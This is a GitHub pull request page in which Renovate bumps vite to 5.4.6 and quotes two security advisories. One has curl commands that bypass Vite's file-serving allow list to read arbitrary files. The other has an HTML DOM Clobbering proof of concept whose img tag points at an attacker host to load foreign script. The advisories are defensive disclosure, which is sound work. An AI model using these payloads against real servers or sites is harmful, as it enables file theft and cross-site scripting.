Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

chore(deps): update dependency vite to v5.4.6 [security] #1601

Open
wants to merge 1 commit into
base: main
Choose a base branch
from

Conversation

renovate[bot]
Copy link
Contributor

@renovate renovate bot commented Sep 17, 2024

This PR contains the following updates:

Package Change Age Adoption Passing Confidence
vite (source) 5.4.2 -> 5.4.6 age adoption passing confidence

GitHub Vulnerability Alerts

CVE-2024-45811

Summary

The contents of arbitrary files can be returned to the browser.

Details

@fs denies access to files outside of Vite serving allow list. Adding ?import&raw to the URL bypasses this limitation and returns the file content if it exists.

PoC

$ npm create vite@latest
$ cd vite-project/
$ npm install
$ npm run dev

$ echo "top secret content" > /tmp/secret.txt

# expected behaviour
$ curl "http://localhost:5173/@​fs/tmp/secret.txt"

    <body>
      <h1>403 Restricted</h1>
      <p>The request url &quot;/tmp/secret.txt&quot; is outside of Vite serving allow list.

# security bypassed
$ curl "http://localhost:5173/@&#8203;fs/tmp/secret.txt?import&raw"
export default "top secret content\n"
//# sourceMappingURL=data:application/json;base64,eyJ2...

CVE-2024-45812

Summary

We discovered a DOM Clobbering vulnerability in Vite when building scripts to cjs/iife/umd output format. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an img tag with an unsanitized name attribute) are present.

Note that, we have identified similar security issues in Webpack: GHSA-4vvj-4cpr-p986

Details

Backgrounds

DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. More for information about DOM Clobbering, here are some references:

[1] https://scnps.co/papers/sp23_domclob.pdf
[2] https://research.securitum.com/xss-in-amp4email-dom-clobbering/

Gadgets found in Vite

We have identified a DOM Clobbering vulnerability in Vite bundled scripts, particularly when the scripts dynamically import other scripts from the assets folder and the developer sets the build output format to cjs, iife, or umd. In such cases, Vite replaces relative paths starting with __VITE_ASSET__ using the URL retrieved from document.currentScript.

However, this implementation is vulnerable to a DOM Clobbering attack. The document.currentScript lookup can be shadowed by an attacker via the browser's named DOM tree element access mechanism. This manipulation allows an attacker to replace the intended script element with a malicious HTML element. When this happens, the src attribute of the attacker-controlled element is used as the URL for importing scripts, potentially leading to the dynamic loading of scripts from an attacker-controlled server.

const relativeUrlMechanisms = {
  amd: (relativePath) => {
    if (relativePath[0] !== ".") relativePath = "./" + relativePath;
    return getResolveUrl(
      `require.toUrl('${escapeId(relativePath)}'), document.baseURI`
    );
  },
  cjs: (relativePath) => `(typeof document === 'undefined' ? ${getFileUrlFromRelativePath(
    relativePath
  )} : ${getRelativeUrlFromDocument(relativePath)})`,
  es: (relativePath) => getResolveUrl(
    `'${escapeId(partialEncodeURIPath(relativePath))}', import.meta.url`
  ),
  iife: (relativePath) => getRelativeUrlFromDocument(relativePath),
  // NOTE: make sure rollup generate `module` params
  system: (relativePath) => getResolveUrl(
    `'${escapeId(partialEncodeURIPath(relativePath))}', module.meta.url`
  ),
  umd: (relativePath) => `(typeof document === 'undefined' && typeof location === 'undefined' ? ${getFileUrlFromRelativePath(
    relativePath
  )} : ${getRelativeUrlFromDocument(relativePath, true)})`
};

PoC

Considering a website that contains the following main.js script, the devloper decides to use the Vite to bundle up the program with the following configuration.

// main.js
import extraURL from './extra.js?url'
var s = document.createElement('script')
s.src = extraURL
document.head.append(s)
// extra.js
export default "https://myserver/justAnOther.js"
// vite.config.js
import { defineConfig } from 'vite'

export default defineConfig({
  build: {
    assetsInlineLimit: 0, // To avoid inline assets for PoC
    rollupOptions: {
      output: {
        format: "cjs"
      },
    },
  },
  base: "./",
});

After running the build command, the developer will get following bundle as the output.

// dist/index-DDmIg9VD.js
"use strict";const t=""+(typeof document>"u"?require("url").pathToFileURL(__dirname+"/extra-BLVEx9Lb.js").href:new URL("extra-BLVEx9Lb.js",document.currentScript&&document.currentScript.src||document.baseURI).href);var e=document.createElement("script");e.src=t;document.head.append(e);

Adding the Vite bundled script, dist/index-DDmIg9VD.js, as part of the web page source code, the page could load the extra.js file from the attacker's domain, attacker.controlled.server. The attacker only needs to insert an img tag with the name attribute set to currentScript. This can be done through a website's feature that allows users to embed certain script-less HTML (e.g., markdown renderers, web email clients, forums) or via an HTML injection vulnerability in third-party JavaScript loaded on the page.

<!DOCTYPE html>
<html>
<head>
  <title>Vite Example</title>
  <!-- Attacker-controlled Script-less HTML Element starts--!>
  <img name="currentScript" src="https://attacker.controlled.server/"></img>
  <!-- Attacker-controlled Script-less HTML Element ends--!>
</head>
<script type="module" crossorigin src="/assets/index-DDmIg9VD.js"></script>
<body>
</body>
</html>

Impact

This vulnerability can result in cross-site scripting (XSS) attacks on websites that include Vite-bundled files (configured with an output format of cjs, iife, or umd) and allow users to inject certain scriptless HTML tags without properly sanitizing the name or id attributes.

Patch

// https://github.com/vitejs/vite/blob/main/packages/vite/src/node/build.ts#L1296
const getRelativeUrlFromDocument = (relativePath: string, umd = false) =>
  getResolveUrl(
    `'${escapeId(partialEncodeURIPath(relativePath))}', ${
      umd ? `typeof document === 'undefined' ? location.href : ` : ''
    }document.currentScript && document.currentScript.tagName.toUpperCase() === 'SCRIPT' && document.currentScript.src || document.baseURI`,
  )

Release Notes

vitejs/vite (vite)

v5.4.6

Compare Source

Please refer to CHANGELOG.md for details.

v5.4.5

Compare Source

Please refer to CHANGELOG.md for details.

v5.4.4

Compare Source

Please refer to CHANGELOG.md for details.

v5.4.3

Compare Source

@renovate renovate bot enabled auto-merge (squash) September 17, 2024 19:21
@renovate renovate bot force-pushed the renovate/npm-vite-vulnerability branch from f8761a5 to 064dc2d Compare September 18, 2024 16:36
@renovate renovate bot force-pushed the renovate/npm-vite-vulnerability branch from 064dc2d to 5905be0 Compare September 19, 2024 16:23
@renovate renovate bot force-pushed the renovate/npm-vite-vulnerability branch from 5905be0 to bbb20e7 Compare September 23, 2024 16:23
@renovate renovate bot force-pushed the renovate/npm-vite-vulnerability branch from bbb20e7 to 23fb246 Compare September 23, 2024 17:08
@renovate renovate bot force-pushed the renovate/npm-vite-vulnerability branch from 23fb246 to 9b24824 Compare September 23, 2024 23:48
@renovate renovate bot force-pushed the renovate/npm-vite-vulnerability branch from 9b24824 to e3b54cc Compare September 23, 2024 23:55
@renovate renovate bot force-pushed the renovate/npm-vite-vulnerability branch from e3b54cc to c50d4a7 Compare September 24, 2024 00:07
@renovate renovate bot force-pushed the renovate/npm-vite-vulnerability branch from c50d4a7 to d9d5444 Compare September 24, 2024 18:26
@renovate renovate bot force-pushed the renovate/npm-vite-vulnerability branch from d9d5444 to ef2658f Compare September 24, 2024 18:45
@renovate renovate bot force-pushed the renovate/npm-vite-vulnerability branch from ef2658f to 9a12afb Compare September 24, 2024 23:26
@renovate renovate bot force-pushed the renovate/npm-vite-vulnerability branch 2 times, most recently from a7ae994 to 382dd9c Compare September 25, 2024 15:24
@renovate renovate bot force-pushed the renovate/npm-vite-vulnerability branch from 382dd9c to cb2019d Compare September 25, 2024 16:29
@renovate renovate bot force-pushed the renovate/npm-vite-vulnerability branch from cb2019d to a924017 Compare September 25, 2024 16:40
@renovate renovate bot force-pushed the renovate/npm-vite-vulnerability branch from bd2e309 to 54eae00 Compare September 26, 2024 20:00
@renovate renovate bot force-pushed the renovate/npm-vite-vulnerability branch from 54eae00 to f35592d Compare September 27, 2024 17:12
@renovate renovate bot force-pushed the renovate/npm-vite-vulnerability branch from f35592d to a2c97eb Compare September 27, 2024 19:10
@renovate renovate bot force-pushed the renovate/npm-vite-vulnerability branch from a2c97eb to a9c79d5 Compare October 3, 2024 19:38
@renovate renovate bot force-pushed the renovate/npm-vite-vulnerability branch from a9c79d5 to 7db6900 Compare October 4, 2024 21:17
@renovate renovate bot force-pushed the renovate/npm-vite-vulnerability branch from 7db6900 to b0432e1 Compare October 4, 2024 21:27
@renovate renovate bot force-pushed the renovate/npm-vite-vulnerability branch from b0432e1 to a0e2dad Compare October 8, 2024 23:03
@renovate renovate bot force-pushed the renovate/npm-vite-vulnerability branch from a0e2dad to 03e471f Compare October 9, 2024 20:49
@renovate renovate bot force-pushed the renovate/npm-vite-vulnerability branch from 03e471f to 19e0488 Compare October 9, 2024 22:20
@renovate renovate bot force-pushed the renovate/npm-vite-vulnerability branch from 19e0488 to fb4cf5a Compare October 10, 2024 17:09
@renovate renovate bot force-pushed the renovate/npm-vite-vulnerability branch from fb4cf5a to 866c412 Compare October 10, 2024 19:59
Copy link

sonarcloud bot commented Oct 10, 2024

Copy link

sonarcloud bot commented Oct 10, 2024

Copy link

sonarcloud bot commented Oct 10, 2024

Copy link

sonarcloud bot commented Oct 10, 2024

Copy link

sonarcloud bot commented Oct 10, 2024

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.

0 participants